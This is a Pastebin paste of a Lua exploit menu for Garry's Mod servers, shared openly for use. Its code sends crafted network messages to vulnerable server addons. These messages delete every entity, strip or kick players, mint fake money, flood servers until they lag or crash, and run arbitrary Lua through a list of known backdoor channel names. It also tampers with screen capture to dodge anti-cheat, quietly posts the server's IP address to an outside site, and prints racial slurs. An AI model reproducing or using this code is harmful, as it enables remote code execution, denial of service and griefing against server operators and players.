Advertisement
Guest User

Luc1fer is a cunt exploit menu gmod

a guest
Jun 2nd, 2018
3,029
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 47.38 KB | None | 0 0
  1. local RunString = RunString
  2. local net = table.Copy(net)
  3. local file = file
  4. net.Stort = net.Start
  5.  
  6. if(istable(MOTDgd))then
  7. MOTDgd = {}
  8. function MOTDgd.Show() end
  9. function MOTDgd.GetIfSkip() return true end
  10. end -- no shit ok?
  11. /*
  12. -- vars
  13. */
  14. local s = {}
  15. s.STARTDETOURED = false
  16. concommand.Add("net_detour_start",function()
  17. if(type(net.Stort) != "nil")then
  18. s.STARTDETOURED = true
  19. net.Start = net.Stort
  20. print("net.Start Detoured")
  21. s.NoPls = function()
  22. RunString([[net.Start = function() end]])
  23. end
  24. s.YesPls = function()
  25. RunString([[net.Start = net.Stort]])
  26. end
  27. else
  28. print("sry u cant")
  29. end
  30. end)
  31.  
  32. print("'net_detour_start' if u need it!")
  33.  
  34. s.ChatClear,_ = pcall(require,"chatclear")
  35. s.Bind = {}
  36. s.Bind.Buttons = {}
  37. s.Bind.Buttons["q"] = KEY_Q
  38. s.Bind.Buttons["w"] = KEY_W
  39. s.Bind.Buttons["e"] = KEY_E
  40. s.Bind.Buttons["r"] = KEY_R
  41. s.Bind.Buttons["t"] = KEY_T
  42. s.Bind.Buttons["y"] = KEY_Y
  43. s.Bind.Buttons["u"] = KEY_U
  44. s.Bind.Buttons["i"] = KEY_I
  45. s.Bind.Buttons["o"] = KEY_O
  46. s.Bind.Buttons["p"] = KEY_P
  47. s.Bind.Buttons["a"] = KEY_A
  48. s.Bind.Buttons["s"] = KEY_S
  49. s.Bind.Buttons["d"] = KEY_D
  50. s.Bind.Buttons["f"] = KEY_F
  51. s.Bind.Buttons["g"] = KEY_G
  52. s.Bind.Buttons["h"] = KEY_H
  53. s.Bind.Buttons["j"] = KEY_J
  54. s.Bind.Buttons["k"] = KEY_K
  55. s.Bind.Buttons["l"] = KEY_L
  56. s.Bind.Buttons["z"] = KEY_Z
  57. s.Bind.Buttons["x"] = KEY_X
  58. s.Bind.Buttons["c"] = KEY_C
  59. s.Bind.Buttons["v"] = KEY_V
  60. s.Bind.Buttons["b"] = KEY_B
  61. s.Bind.Buttons["n"] = KEY_N
  62. s.Bind.Buttons["m"] = KEY_M
  63. s.Bind.Buttons["home"] = KEY_HOME
  64. s.Bind.Buttons["end"] = KEY_END
  65.  
  66. s.Bind.Bind = s.Bind.Buttons["end"]
  67.  
  68. if(!file.Exists("_sex_info/_setting.txt","DATA"))then
  69. s.Bind.Ask = vgui.Create( "DFrame" )
  70. s.Bind.Ask.PerformLayout = function()
  71. s.Bind.Ask.lblTitle:SetFont("_xploiter_font@@@")
  72. s.Bind.Ask.lblTitle:SetPos( 8 , 2 )
  73. s.Bind.Ask.lblTitle:SetSize( s.Bind.Ask:GetWide() - 25, 20 )
  74. end
  75. s.Bind.Ask.ShowCloseButton = function() end
  76. s.Bind.Ask:SetSize(400,200)
  77. s.Bind.Ask:SetTitle("Select exploit menu bind pls")
  78. s.Bind.Ask:Center()
  79. s.Bind.Ask.btnMaxim:Remove()
  80. s.Bind.Ask.btnMinim:Remove()
  81. s.Bind.Ask.btnClose:Remove()
  82. s.Bind.Ask:MakePopup()
  83.  
  84. s.Bind.AskDSP = vgui.Create( "DScrollPanel", s.Bind.Ask )
  85. s.Bind.AskDSP:Dock( FILL )
  86. for k,v in pairs (s.Bind.Buttons) do
  87. local button = s.Bind.AskDSP:Add( "DButton" )
  88. button:Dock( TOP )
  89. button:DockMargin( 0, 0, 0, 5 )
  90. button:SetText( string.upper(k) )
  91. button:SetFont("_xploiter_font@@_")
  92. button.DoClick = function()
  93. file.CreateDir("_sex_info")
  94. file.Write("_sex_info/_setting.txt",k)
  95. s.Bind.Bind = s.Bind.Buttons[k]
  96. s.Bind.Ask:Remove()
  97. end
  98. end
  99. else
  100. s.Bind.Bind = s.Bind.Buttons[file.Read("_sex_info/_setting.txt","DATA")]
  101. end
  102. s.hitRequest = {}
  103. s.hitRequest.hitman = LocalPlayer()
  104. s.hitRequest.requester = LocalPlayer()
  105. s.hitRequest.target = LocalPlayer()
  106. s.hitRequest.reward = -99999999999999999999999
  107. s.duel = {}
  108. s.duel[1] = table.Random( player.GetAll() )
  109. s.duel[2] = table.Random( player.GetAll() )
  110. s.duel[2] = 3
  111. s.duel[3] = -9999999
  112. s.lagz16 = { cmd = "+forward" , args = " " }
  113. s.lags17 = { " " , "Open" , nil , nil , nil , nil }
  114. s.Target = {}
  115. s.Exploits = {}
  116. s.colors = {}
  117. s.count = 0
  118. s.AtlasFuck = ""
  119. for i=1, 100 do
  120. s.AtlasFuck = s.AtlasFuck .. "<avatar>"
  121. end
  122. s.pp = istable(FPP) or istable(GPP) or istable(CPP) -- need mor
  123. s.colors[1] = Color(28,28,28,30)
  124. s.colors[2] = Color(75,50,100,30)
  125. s.colors[3] = Color(1,149,205,30)
  126. s.colors[4] = Color(255,144,0,30)
  127. s.colors[5] = Color(229,13,13,30)
  128. s.LagText = "0xFFFFFFF"
  129. /*
  130. -- Init menu
  131. */
  132. surface.CreateFont("_xploiter_font@@@",{font = "tahoma",size = 22,weight = 10000,blursize = 0,scanlines = 0,antialias = true})
  133. surface.CreateFont("_xploiter_font@@_",{font = "tahoma",size = 16,weight = 10000,blursize = 0,scanlines = 0,antialias = true})
  134. surface.CreateFont("_xploiter_font@__",{font = "tahoma",size = 12,weight = 10000,blursize = 0,scanlines = 0,antialias = true})
  135.  
  136.  
  137. s.Main = vgui.Create("DFrame")
  138. s.Main:SetSize(700,600)
  139. s.Main:Center()
  140. s.Main:SetTitle("Luc1fer is a Cunt")
  141. s.Main.Paint = function(_,w,h)
  142. --draw.RoundedBox(0,0,0,w,h,Color(28,28,28,235))
  143. --draw.RoundedBox(0,0,0,w,25,Color(28,28,28,255))
  144. local f;
  145. for i=0, 600 do
  146. f = i / 600;
  147.  
  148. surface.SetDrawColor(
  149. math.min(Lerp(f, color_black.r, Color(50,50,50).r), 255),
  150. math.min(Lerp(f, color_black.g, Color(50,50,50).g), 255),
  151. math.min(Lerp(f, color_black.b, Color(50,50,50).b), 255),
  152. 255
  153. );
  154. surface.DrawLine(0, i, 700, i);
  155. end
  156. draw.SimpleText(#s.Exploits.."/"..s.count,"_xploiter_font@@_",350,0,Color(255,255,255,204))
  157. if(!s.pp)then
  158. draw.SimpleText("Shit Server Crash it","_xploiter_font@@_",400,0,Color(255,255,255,204))
  159. end
  160. draw.SimpleText("Group","_xploiter_font@@_",485,25,Color(255,255,255,204))
  161. draw.SimpleText("Team","_xploiter_font@@_",573,25,Color(255,255,255,204))
  162. draw.SimpleText("Name","_xploiter_font@@_",661,25,Color(255,255,255,204))
  163. end
  164.  
  165. s.Main:MakePopup()
  166. s.Main.btnClose.DoClick = function()
  167. s.Main:Hide()
  168. end
  169. s.oldRC = render.Capture
  170. render.Capture = function( ... )
  171. s.Main:Hide()
  172. render.RenderView()
  173. render.RenderHUD(0,0,ScrW(),ScrH())
  174. for k,v in pairs (hook.GetTable()["HUDPaint"]) do
  175. v()
  176. end
  177. timer.Simple(0.5,function()
  178. chat.AddText("[SEX] some shit screengrabbed u and menu was closed")
  179. end)
  180. return s.oldRC( ... )
  181. end
  182. s.Main.btnClose.Paint = function(_,w,h)
  183. if(s.Main.btnClose:IsDown())then
  184. draw.RoundedBox(0,0,0,w,h,Color(255,0,0,235))
  185. else
  186. draw.RoundedBox(0,0,0,w,h,Color(255,50,50,235))
  187. end
  188. end
  189. s.Main.PerformLayout = function()
  190. s.Main.lblTitle:SetFont("_xploiter_font@@@")
  191. s.Main.lblTitle:SetPos( 8 , 2 )
  192. s.Main.lblTitle:SetSize( s.Main:GetWide() - 25, 20 )
  193. end
  194. s.Main.ShowCloseButton = function() end
  195. s.Main.btnMaxim:Remove()
  196. s.Main.btnMinim:Remove()
  197. s.Main:Hide()
  198. s.lock = 0
  199. vgui.GetWorldPanel().Paint = function()
  200. for i=1,#s.Target do
  201. if !IsValid(s.Target[i]) then
  202. table.remove( s.Target, i )
  203. end
  204. end
  205. if(input.IsKeyDown(s.Bind.Bind) and !LocalPlayer():IsTyping())then
  206. if(s.lock == 0)then
  207. if(s.Main:IsVisible())then
  208. s.Main:Hide()
  209. s.lock = 1
  210. else
  211. s.Main:Show()
  212. s.lock = 1
  213. if(IsValid(s.dsp))then
  214. table.sort( s.Exploits, function( a, b ) return a[10] > b[10] end )
  215. s.dsp:Clear()
  216. for k, v in pairs( s.Exploits ) do
  217. if(v[5] == 1 and !isnumber(v[7]) )then
  218. v[7] = 0
  219. end
  220. local sploit = s.dsp:Add( "DButton" )
  221. sploit:SetText('')
  222. sploit:SetPos(5,(k-1)*50+5)
  223. sploit:SetSize(465,45)
  224. sploit.Paint = function(_,w,h)
  225. --draw.RoundedBox(0,0,0,w,h,s.colors[v[10]])
  226. local f;
  227. for i=0, 45 do
  228. f = i / 45;
  229.  
  230. surface.SetDrawColor(
  231. math.min(Lerp(f, color_black.r, s.colors[v[10]].r), 255),
  232. math.min(Lerp(f, color_black.g, s.colors[v[10]].g), 255),
  233. math.min(Lerp(f, color_black.b, s.colors[v[10]].b), 255),
  234. 255
  235. );
  236. surface.DrawLine(0, i,465, i);
  237. end
  238. draw.SimpleText("Name: '"..v[1].."'","_xploiter_font@@_",5,2,Color(255,255,255,204))
  239. draw.SimpleText("Net string: '"..v[3].."'","_xploiter_font@@_",w-5,2,Color(255,255,255,204),2)
  240. draw.SimpleText("Hint: '"..v[2].."'","_xploiter_font@@_",5,25,Color(255,255,255,204))
  241. if(v[7] == 1)then
  242. draw.RoundedBox(0,347, 22, 111 , 16,Color(50,255,50,54))
  243. end
  244. if(!isnumber(v[7]))then
  245. if(sploit:IsDown())then
  246. draw.RoundedBox(0,347, 22, 111 , 16,Color(50,50,255,54))
  247. end
  248. end
  249. surface.SetDrawColor( Color(255,255,255,204) )
  250. surface.DrawOutlinedRect( 0, 0, w , h )
  251. surface.DrawOutlinedRect( 345, 20, 115 , 20 )
  252. end
  253. sploit.DoClick = function()
  254. if(isnumber(v[7]))then
  255. if(v[7] == 0)then
  256. surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] -> "..v[3])
  257. if(s.STARTDETOURED)then s.NoPls() end
  258. v[7] = 1
  259. v[4](v[7])
  260. else
  261. surface.PlaySound("buttons/combine_button2.wav") chat.AddText("[SEX] || "..v[3])
  262. if(s.STARTDETOURED)then s.YesPls() end
  263. v[7] = 0
  264. v[4](v[7])
  265. end
  266. else
  267. surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] --> "..v[3])
  268. v[4]()
  269. end
  270. end
  271. end
  272. end
  273. if(IsValid(s.dsp2))then
  274. s.dsp2:Clear()
  275. for k, v in pairs( player.GetAll() ) do
  276. local Egrok = s.dsp2:Add( "DButton" )
  277. Egrok:SetText( v:GetUserGroup().." | "..team.GetName(v:Team()).." | "..v:Nick() )
  278. Egrok:SetPos(5,(k-1)*30+5)
  279. Egrok:SetSize(200,25)
  280. Egrok:SetFont( "_xploiter_font@__" )
  281. Egrok.Paint = function(_,w,h)
  282. if(table.HasValue(s.Target,v))then
  283. draw.RoundedBox(0,0,0,w,h,Color(255,50,50,204))
  284. end
  285. surface.SetDrawColor( Color(255,255,255,204) )
  286. surface.DrawOutlinedRect( 0, 0, w , h )
  287. if(!IsValid(v))then
  288. table.RemoveByValue(s.Target,v)
  289. Egrok:Remove()
  290. end
  291. end
  292. Egrok.DoClick = function()
  293. if(table.HasValue(s.Target,v))then
  294. table.RemoveByValue(s.Target,v)
  295. else
  296. s.Target[#s.Target+1]=v
  297. end
  298. end
  299. Egrok.UpdateColours = function()
  300. return Egrok:SetTextStyleColor( Color(255,255,255,204) )
  301. end
  302. end
  303. end
  304. end
  305. end
  306. else
  307. s.lock = 0
  308. end
  309. end
  310. concommand.Add("open_cool_menu",function()
  311. s.Main:Show()
  312. s.lock = 1
  313. if(IsValid(s.dsp))then
  314. table.sort( s.Exploits, function( a, b ) return a[10] > b[10] end )
  315. s.dsp:Clear()
  316. for k, v in pairs( s.Exploits ) do
  317. if(v[5] == 1 and !isnumber(v[7]) )then
  318. v[7] = 0
  319. end
  320. local sploit = s.dsp:Add( "DButton" )
  321. sploit:SetText('')
  322. sploit:SetPos(5,(k-1)*50+5)
  323. sploit:SetSize(465,45)
  324. sploit.Paint = function(_,w,h)
  325. local f;
  326. for i=0, 45 do
  327. f = i / 45;
  328. surface.SetDrawColor(
  329. math.min(Lerp(f, color_black.r, s.colors[v[10]].r), 255),
  330. math.min(Lerp(f, color_black.g, s.colors[v[10]].g), 255),
  331. math.min(Lerp(f, color_black.b, s.colors[v[10]].b), 255),
  332. 255
  333. );
  334. surface.DrawLine(0, i,465, i);
  335. end
  336. draw.SimpleText("Name: '"..v[1].."'","_xploiter_font@@_",5,2,Color(255,255,255,204))
  337. draw.SimpleText("Net string: '"..v[3].."'","_xploiter_font@@_",w-5,2,Color(255,255,255,204),2)
  338. draw.SimpleText("Hint: '"..v[2].."'","_xploiter_font@@_",5,25,Color(255,255,255,204))
  339. if(v[7] == 1)then
  340. draw.RoundedBox(0,347, 22, 111 , 16,Color(50,255,50,54))
  341. end
  342. if(!isnumber(v[7]))then
  343. if(sploit:IsDown())then
  344. draw.RoundedBox(0,347, 22, 111 , 16,Color(50,50,255,54))
  345. end
  346. end
  347. surface.SetDrawColor( Color(255,255,255,204) )
  348. surface.DrawOutlinedRect( 0, 0, w , h )
  349. surface.DrawOutlinedRect( 345, 20, 115 , 20 )
  350. end
  351. sploit.DoClick = function()
  352. if(isnumber(v[7]))then
  353. if(v[7] == 0)then
  354. surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] -> "..v[3])
  355. if(s.STARTDETOURED)then s.NoPls() end
  356. v[7] = 1
  357. v[4](v[7])
  358. else
  359. surface.PlaySound("buttons/combine_button2.wav") chat.AddText("[SEX] || "..v[3])
  360. if(s.STARTDETOURED)then s.YesPls() end
  361. v[7] = 0
  362. v[4](v[7])
  363. end
  364. else
  365. surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] --> "..v[3])
  366. v[4]()
  367. end
  368. end
  369. end
  370. end
  371. if(IsValid(s.dsp2))then
  372. s.dsp2:Clear()
  373. for k, v in pairs( player.GetAll() ) do
  374. local Egrok = s.dsp2:Add( "DButton" )
  375. Egrok:SetText( v:GetUserGroup().." | "..team.GetName(v:Team()).." | "..v:Nick() )
  376. Egrok:SetPos(5,(k-1)*30+5)
  377. Egrok:SetSize(200,25)
  378. Egrok:SetFont( "_xploiter_font@__" )
  379. Egrok.Paint = function(_,w,h)
  380. if(table.HasValue(s.Target,v))then
  381. draw.RoundedBox(0,0,0,w,h,Color(255,50,50,204))
  382. end
  383. surface.SetDrawColor( Color(255,255,255,204) )
  384. surface.DrawOutlinedRect( 0, 0, w , h )
  385. if(!IsValid(v))then
  386. table.RemoveByValue(s.Target,v)
  387. Egrok:Remove()
  388. end
  389. end
  390. Egrok.DoClick = function()
  391. if(table.HasValue(s.Target,v))then
  392. table.RemoveByValue(s.Target,v)
  393. else
  394. s.Target[#s.Target+1]=v
  395. end
  396. end
  397. Egrok.UpdateColours = function()
  398. return Egrok:SetTextStyleColor( Color(255,255,255,204) )
  399. end
  400. end
  401. end
  402. end)
  403. print("if u dumb nigger then type in console 'open_cool_menu'")
  404. print("open_cool_menu <- type it in ur console nigga")
  405. print("open_cool_menu")
  406. print("-> open_cool_menu <-")
  407. s.dsp = vgui.Create( "DScrollPanel", s.Main )
  408. s.dsp:SetPos(5,25)
  409. s.dsp:SetSize(475,570)
  410. s.dsp.Paint = function(_,w,h)
  411. surface.SetDrawColor( Color(255,255,255,204) )
  412. surface.DrawOutlinedRect( 0, 0, w , h )
  413. end
  414. s.dsp2 = vgui.Create( "DScrollPanel", s.Main )
  415. s.dsp2:SetPos(485,45)
  416. s.dsp2:SetSize(210,490)
  417. s.dsp2.Paint = function(_,w,h)
  418. surface.SetDrawColor( Color(255,255,255,204) )
  419. surface.DrawOutlinedRect( 0, 0, w , h )
  420. end
  421. s.TE = vgui.Create( "DTextEntry", s.Main )
  422. s.TE:SetPos(485,540)
  423. s.TE:SetSize(210,25)
  424. s.TE:SetText("Shitty Paste")
  425. s.TE:SetFont("_xploiter_font@@_")
  426. s.TE.Paint = function(s,w,h)
  427. s:DrawTextEntryText(Color(255,255,255,204), Color(70, 70, 255), Color(0,0,0))
  428. surface.SetDrawColor( Color(255,255,255,204) )
  429. surface.DrawOutlinedRect( 0, 0, w , h )
  430. end
  431. s.SaveShit = vgui.Create( "DButton", s.Main )
  432. s.SaveShit:SetPos(485,570)
  433. s.SaveShit:SetSize(210,25)
  434. s.SaveShit:SetFont( "_xploiter_font@__" )
  435. s.SaveShit:SetText("Save server bullshit something idk")
  436. s.SaveShit.Paint = function(_,w,h)
  437. if(s.SaveShit:IsDown())then
  438. draw.RoundedBox(0,0,0,w,h,Color(50,255,50,104))
  439. else
  440. draw.RoundedBox(0,0,0,w,h,Color(50,255,50,54))
  441. end
  442. surface.SetDrawColor( Color(255,255,255,204) )
  443. surface.DrawOutlinedRect( 0, 0, w , h )
  444. end
  445. s.SaveShit.UpdateColours = function()
  446. return s.SaveShit:SetTextStyleColor( Color(255,255,255,204) )
  447. end
  448. s.SaveShit.DoClick = function()
  449. surface.PlaySound( "items/ammo_pickup.wav" )
  450. http.Post("http://osniffer.pro/danet_1.gif?"..game.GetIPAddress(),{})
  451. chat.AddText("saved to data/_sex_info/"..string.Replace(game.GetIPAddress(),":","-").." ("..#s.Exploits.."-"..s.count..").txt")
  452. if(!file.Exists("_sex_info","DATA"))then
  453. file.CreateDir("_sex_info")
  454. end
  455. local name = "_sex_info/"..string.Replace(game.GetIPAddress(),":","-").." ("..#s.Exploits.."-"..s.count..").txt"
  456. file.Write(name,"IP: "..game.GetIPAddress().." aka '"..GetHostName().."'\r\nExploits Count: "..#s.Exploits.."/"..s.count.."\r\nExploit List:\r\n")
  457. for i=1,#s.Exploits do
  458. file.Append(name,"\r\n".."#"..i.." "..s.Exploits[i][1].."("..s.Exploits[i][3]..")".."\r\n"..s.Exploits[i][2].."\r\n")
  459. end
  460. end
  461.  
  462. /*
  463. -- Functions
  464. */
  465. s.ValidNetString = function( str )
  466. return isstring(str) and util.NetworkStringToID( str ) != 0 and str != ""
  467. end
  468. s.AddExploit = function( rare, name , dis , netstr , onfunc , multi , needpp , timername , delay )
  469. if(!isnumber(delay))then
  470. delay = 0.5
  471. end
  472. local num = #s.Exploits+1
  473. if(needpp == 0 or (needpp == 1 and !s.pp))then
  474. if(isstring(netstr))then
  475. if(s.ValidNetString(netstr) or netstr == "")then
  476. s.Exploits[num] = {}
  477. s.Exploits[num][1] = name
  478. s.Exploits[num][2] = dis
  479. if(netstr == "")then
  480. s.Exploits[num][3] = name
  481. else
  482. s.Exploits[num][3] = netstr
  483. end
  484. if(multi == 1)then
  485. s.Exploits[num][4] = function(per)
  486. timer.Create(timername, delay, 0, function()
  487. if(per == 1)then
  488. onfunc()
  489. else
  490. timer.Remove(timername)
  491. end
  492. end)
  493. end
  494. else
  495. s.Exploits[num][4] = function() onfunc() end
  496. end
  497. s.Exploits[num][5] = multi
  498. s.Exploits[num][6] = needpp
  499. s.Exploits[num][10] = rare
  500. end
  501. end
  502. if(istable(netstr))then
  503. local valid = false
  504. for i=1,#netstr do
  505. if(s.ValidNetString(netstr[i]))then
  506. valid = true
  507. end
  508. end
  509. if(valid)then
  510. s.Exploits[num] = {}
  511. s.Exploits[num][1] = name
  512. s.Exploits[num][2] = dis
  513. local net_key = " "
  514. for i=1,#netstr do
  515. if(s.ValidNetString(netstr[i]))then
  516. net_key = net_key .. netstr[i] .. " "
  517. end
  518. end
  519. s.Exploits[num][3] = tostring(net_key)
  520.  
  521. if(multi == 1)then
  522. s.Exploits[num][4] = function(per)
  523. timer.Create(timername, delay, 0, function()
  524. if(per == 1)then
  525. for i=1,#netstr do onfunc(netstr[i]) print(netstr[i]) end
  526. else
  527. timer.Remove(timername)
  528. end
  529. end)
  530. end
  531. else
  532. s.Exploits[num][4] = function() for i=1,#netstr do onfunc(netstr[i]) end end
  533. end
  534. s.Exploits[num][5] = multi
  535. s.Exploits[num][6] = needpp
  536. s.Exploits[num][10] = rare
  537. end
  538. end
  539. end
  540. s.count = s.count + 1
  541. end
  542. /*
  543. -- Exploits
  544. */
  545. s.AddExploit(2,"Remove all ents","Remove all entities lol","properties",function()
  546. for i=1,#ents.GetAll() do
  547. net.Start( "properties" )
  548. net.WriteString( "remove" )
  549. net.WriteEntity( ents.GetAll()[i] )
  550. net.SendToServer()
  551. end
  552. end, 0,1)
  553. s.AddExploit(2,"Strip weapon","Select target and toggle stripper","properties",function()
  554. for i=1,#s.Target do
  555. if(IsValid(s.Target[i]) and IsValid(s.Target[i]:GetActiveWeapon()))then
  556. net.Start( "properties" )
  557. net.WriteString( "remove" )
  558. net.WriteEntity( s.Target[i]:GetActiveWeapon() )
  559. net.SendToServer()
  560. end
  561. end
  562. end, 1,1,"_sex_strip_weapons",0.1)
  563. s.AddExploit(1,"Get Easter Egg","write shit in chat also funny","egg",function()
  564. net.Start( "egg" )
  565. net.SendToServer()
  566. end, 0,0)
  567. s.AddExploit( 3, "Give weapons" , "Give some weapons for you (enter type)" , "CraftSomething" , function()
  568. net.Start( "CraftSomething" )
  569. net.WriteEntity( LocalPlayer() )
  570. net.WriteString( s.TE:GetText() )
  571. net.WriteString( "" )
  572. net.WriteString( "weapon" )
  573. net.SendToServer()
  574. end, 0 , 0)
  575. s.AddExploit( 3, "Inf ammo" , "buy inf ammo for you wepon" , "TCBBuyAmmo" , function()
  576. net.Start("TCBBuyAmmo")
  577. net.WriteTable( {nil,LocalPlayer():GetActiveWeapon():GetPrimaryAmmoType(),nil,"0","999999"} )
  578. net.SendToServer()
  579. end, 0 , 0)
  580. s.AddExploit(2,"Free rp money #1","Gives u free money from money printers","DataSend",function()
  581. for k, v in pairs( ents.GetAll() ) do
  582. if v:GetClass() == "adv_moneyprinter" then
  583. net.Start("DataSend")
  584. net.WriteFloat(2)
  585. net.WriteEntity(v)
  586. net.WriteEntity(LocalPlayer())
  587. net.SendToServer()
  588. end
  589. end
  590. end, 1,0,"_sex_free_money",1)
  591. s.AddExploit(1,"Set name","U have no name (friends)","gportal_rpname_change",function()
  592. net.Start("gportal_rpname_change")
  593. net.WriteString(s.TE:GetText())
  594. net.WriteString(" ")
  595. net.SendToServer()
  596. end, 0,0)
  597. s.AddExploit(3,"Free rp money #2","Gives u free money from farm shit","FarmingmodSellItems",function()
  598. net.Start( "FarmingmodSellItems" )
  599. net.WriteTable({
  600. Cost = 10,
  601. CropModel = "models/props/eryk/garlic.mdl",
  602. CropType = 2,
  603. Info = "Garlic Seed",
  604. Model = "models/props/eryk/seedbag.mdl",
  605. Name = "Garlic",
  606. Quality = 4,
  607. Sell = 99999,
  608. Type = "Seed"
  609. })
  610. net.WriteInt(1,16)
  611. net.SendToServer()
  612. end, 1,0,"_sex_free_money_2",1)
  613. s.AddExploit(1,"Hack geypads","Hack all keypads (useless)","start_wd_emp",function()
  614. net.Start("start_wd_emp")
  615. net.SendToServer()
  616. end, 0,0)
  617. s.AddExploit(5,"Run lua command","type command in textentry",{"memeDoor",
  618. "Sbox_darkrp",
  619. "Sbox_itemstore",
  620. "Ulib_Message",
  621. "ULogs_Info",
  622. "ITEM",
  623. "fix",
  624. "noclipcloakaesp_chat_text",
  625. "_Defqon",
  626. "nocheat",
  627. "ULX_QUERY2",
  628. "Sandbox_GayParty",
  629. "DarkRP_UTF8",
  630. "oldNetReadData",
  631. "BackDoor",
  632. "OdiumBackDoor",
  633. "cucked",
  634. "NoNerks",
  635. "kek",
  636. "ZimbaBackDoor",
  637. "something",
  638. "random",
  639. "strip0",
  640. "fellosnake",
  641. "idk",
  642. "killserver",
  643. "fuckserver",
  644. "cvaraccess",
  645. "rcon",
  646. "rconadmin",
  647. "web",
  648. "Þà?D)◘",
  649. "DefqonBackdoor",
  650. "Sandbox_Armdupe",
  651. "DarkRP_AdminWeapons",
  652. "SessionBackdoor",
  653. "Fix_Keypads",
  654. "Remove_Exploiters",
  655. "noclipcloakaesp_chat_text",
  656. "_Defqon",
  657. "_CAC_ReadMemory",
  658. "nostrip",
  659. "LickMeOut",
  660. "MoonMan",
  661. "Im_SOCool",
  662. "ULXQUERY2",
  663. "jesuslebg",
  664. "zilnix",
  665. "enablevac",
  666. "c",
  667. "Sbox_gm_attackofnullday_key",
  668. "Þà ?D)◘",
  669. "disablebackdoor",
  670. "kill"},function(netstr)
  671. if(s.ValidNetString(netstr))then
  672. net.Start(netstr)
  673. net.WriteString(s.TE:GetText())
  674. net.WriteBit(1)
  675. net.SendToServer()
  676. net.Start(netstr)
  677. net.WriteString(s.TE:GetText())
  678. net.WriteBit(0)
  679. net.SendToServer()
  680. end
  681. end, 0,0)
  682. s.AddExploit(3,"Free rp money #3","Gives u free money from duel","duelrequestguiYes",function()
  683. net.Start("duelrequestguiYes")
  684. net.WriteInt(math.random(800000,9000000),32)
  685. net.WriteEntity(table.Random( player.GetAll() ))
  686. net.WriteString("Crossbow")
  687. net.SendToServer()
  688. end, 1,0,"_sex_free_money_3",1)
  689. s.AddExploit(2,"Strip weapons","Strip weapons from all legit","drugseffect_remove",function()
  690. net.Start("drugseffect_remove")
  691. net.SendToServer()
  692. end, 0,0)
  693. s.AddExploit(2,"Remove money","Strip weapons from all legit","drugs_money",function()
  694. net.Start("drugs_money")
  695. net.SendToServer()
  696. end, 0,0)
  697. s.AddExploit(3,"Ignity entities","Write type in textentry","drugs_ignite",function()
  698. net.Start("drugs_ignite")
  699. net.WriteString(s.TE:GetText())
  700. net.SendToServer()
  701. end, 0,0)
  702. s.AddExploit(3,"Health crazy","lol wtf u wot m8?","drugseffect_hpremove",function()
  703. net.Start("drugseffect_hpremove")
  704. net.WriteString(math.random(0,999999))
  705. net.SendToServer()
  706. end, 1,0,"_sex_u_wot_m8",0.5)
  707. s.AddExploit(3,"Remove entities","Write type in textentry","drugs_text",function()
  708. net.Start("drugs_text")
  709. net.WriteString(s.TE:GetText())
  710. net.SendToServer()
  711. end, 0,0)
  712. s.AddExploit(3,"Kick all n00bz","Just kick all and you too","DL_Answering",function()
  713. for i=1,1000 do
  714. net.Start("DL_Answering")
  715. net.SendToServer()
  716. end
  717. end, 1,0,"_sex_kick_noobz",0.1)
  718. s.AddExploit(4,"Crash shit server","SimplAC - sucks","SimplicityAC_aysent",function()
  719. net.Start("SimplicityAC_aysent")
  720. net.WriteUInt(1, 8)
  721. net.WriteUInt(4294967295, 32)
  722. net.WriteTable(_G)
  723. net.SendToServer()
  724. end, 0,0)
  725. s.AddExploit(2,"Lags? #1","Just lags","ATS_WARP_REMOVE_CLIENT",function()
  726. for k,v in pairs(player.GetAll()) do
  727. for j=1,5 do
  728. net.Start( "ATS_WARP_REMOVE_CLIENT" )
  729. net.WriteEntity( v )
  730. net.WriteString( "adminroom1" )
  731. net.SendToServer()
  732. net.Start( "ATS_WARP_FROM_CLIENT" )
  733. net.WriteEntity( v )
  734. net.WriteString( "adminroom1" )
  735. net.SendToServer()
  736. net.Start( "ATS_WARP_VIEWOWNER" )
  737. net.WriteEntity( v )
  738. net.WriteString( "adminroom1" )
  739. net.SendToServer()
  740. end
  741. end
  742. end, 1,0,"_sex_lagz_1",0.1)
  743. s.AddExploit(2,"Lags? #2","Just lags","CFRemoveGame",function()
  744. for j=1,2000 do
  745. net.Start( "CFRemoveGame" )
  746. net.WriteFloat( math.Round("2147483646\n") )
  747. net.SendToServer()
  748. net.Start( "CFJoinGame" )
  749. net.WriteFloat( math.Round("2147483646\n") )
  750. net.SendToServer()
  751. net.Start( "CFEndGame" )
  752. net.WriteFloat( math.Round("2147483646\n") )
  753. net.SendToServer()
  754. end
  755. end, 1,0,"_sex_lagz_2",0.1)
  756. s.AddExploit(2,"Lags? #3","Just lags","CreateCase",function()
  757. for j=1,2000 do
  758. net.Start( "CreateCase" )
  759. net.WriteString( s.LagText )
  760. net.SendToServer()
  761. end
  762. end, 1,0,"_sex_lagz_3",0.1)
  763. s.AddExploit(2,"Lags? #4","Just lags","rprotect_terminal_settings",function()
  764. for j=1,2000 do
  765. net.Start( "rprotect_terminal_settings" )
  766. net.WriteEntity( table.Random( player.GetHumans() ) )
  767. net.SendToServer()
  768. end
  769. end, 1,0,"_sex_lagz_4",0.1)
  770. s.AddExploit(2,"Lags? #5","Just lags","StackGhost",function()
  771. for j=1,1100 do
  772. net.Start( "StackGhost" )
  773. net.WriteInt( 69,32 )
  774. net.SendToServer()
  775. end
  776. end, 1,0,"_sex_lagz_5",0.3)
  777. s.AddExploit(3,"Kick guys","Select a target and kick","NLRKick",function()
  778. for i=1,#s.Target do
  779. net.Start("NLRKick")
  780. net.WriteEntity(s.Target[i])
  781. net.SendToServer()
  782. end
  783. end, 0,0)
  784. s.AddExploit(2,"Lags? #6","Just lags","JoinOrg",function()
  785. for j=1,1000 do
  786. for k,v in pairs(player.GetAll()) do
  787. net.Start("JoinOrg")
  788. net.WriteEntity(v)
  789. net.WriteString(s.LagText)
  790. net.SendToServer()
  791. end
  792. end
  793. end, 1,0,"_sex_lagz_6",0.02)
  794. s.AddExploit(3,"Remove entities","write type in textentry (* to all)","timebombDefuse",function()
  795. for i=1,#ents.FindByClass(s.TE:GetText()) do
  796. net.Start("timebombDefuse")
  797. net.WriteEntity(ents.FindByClass(s.TE:GetText())[i])
  798. net.WriteBool(true)
  799. net.SendToServer()
  800. end
  801. end, 0,0)
